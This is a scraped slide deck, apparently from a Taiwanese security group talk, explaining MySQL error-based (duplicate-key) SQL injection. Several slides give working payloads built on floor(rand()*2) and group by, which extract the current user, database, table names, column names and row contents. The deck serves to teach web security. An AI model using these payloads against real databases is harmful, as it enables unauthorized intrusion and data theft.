Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

SQL injection duplicate error principle

5,957 views

Published on

SQL injection duplicate error principle

Published in: Technology
  • Be the first to comment

SQL injection duplicate error principle

  1. 1. SQL Injection語句原理淺析 Vance@hst.tw
  2. 2. I am nobody ● Vance Lin ● A php programer ● Interest in web security ● Hackstuff member
  3. 3. 因為時間有限 所以請先聽我講一個故事
  4. 4. 好的,故事是這樣的
  5. 5. 這時候... 身為初心者的小明就只好選擇放棄了...
  6. 6. 但是 你今天來到這裡,怎麼還可以跟小明一樣就這樣放棄了呢?
  7. 7. 好的,故事結束了 想睡的可以開始睡了,後面都是原理很無聊
  8. 8. 如來神掌第101式 select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a
  9. 9. 大家可能沒有學過如來神掌 所以可能會比較不熟悉... 1.concat 2.floor 3.rand 4.group by
  10. 10. Concat
  11. 11. Floor
  12. 12. Rand
  13. 13. Group by
  14. 14. 開始拆解 select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a ● select user(); 會得到目前連接資料庫的用戶名 ○ 所以就是你想知道甚麼就在這邊塞甚麼 ex.database(),version() ● rand() * 2; 會得到小於1或大於1的數字 ● floor(rand() * 2) 取得0或1 ● concat() 把前面幾條加在一起 ● from information_schema.tables 有較多的row,避免不會造成重複 ● select count(*) 加上這個就有機會造成duplicate group_key
  15. 15. 結果 失敗的時候會出現
  16. 16. 結果 成功的時候會出現
  17. 17. 適用情況 小明已經跟你說了,就是在不能使用Union select的情況下 所以我們就換個(ㄗ)語(ㄕˋ)法再來一次
  18. 18. 進階利用 ● 查 database ○ select count(*), concat('~',(select database()),'~', floor(rand()*2)) as a from information_schema.tables group by a ● 查 table name ○ select count(*),concat((select (select (SELECT distinct concat('~', table_name,'~') FROM information_schema.tables Where table_schema='db_name' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a
  19. 19. 進階利用 ● 查 column name ○ select count(*),concat((select (select (SELECT distinct concat('~', column_name,'~') FROM information_schema.columns Where table_schema='db_name' LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a ● 查 row ○ select count(*),concat((select(select concat(concat('~', column_name,'~'))) from db_name.table_name limit 1,1),floor(rand(0) *2)) as a from information_schema.tables group by a
  20. 20. Demo + Q&A

×